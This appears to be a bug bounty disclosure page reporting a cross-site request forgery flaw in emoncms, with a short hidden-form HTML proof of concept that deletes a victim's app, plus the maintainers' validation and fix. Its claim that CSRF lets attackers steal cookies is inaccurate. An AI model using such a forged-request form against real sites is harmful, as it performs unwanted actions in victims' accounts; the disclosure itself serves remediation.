Cross-Site Request Forgery (CSRF) in emoncms/emoncms


Reported on

Jul 15th 2021

✍️ Description

In CSRF attack if your users going to attacker website and click the mallicouse link then they able to steal users cookie, submit unwanted date, ....

🕵️‍♂️ Proof of Concept login in your account make a file contain the following html file. html ( as victim site) 4.App named "My Electric" going to be deleted after click the "Submit request"

// PoC.html
<script>history.pushState('', '', '/')</script>
<form action="">
<input type="hidden" name="name" value="My&#32;Electric" />
<input type="submit" value="Submit request" />

💥 Impact

the attacker can delete any App in the victim user's account.


you can set cookies on a custom header. this is a fastest way that you can protect your users


amammad modified the report
2 years ago
We have contacted a member of the emoncms team and are waiting to hear back 2 years ago
emoncms/emoncms maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer
2 years ago


Thanks amammad!

emoncms/emoncms maintainer marked this as fixed with commit ca1f5c 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation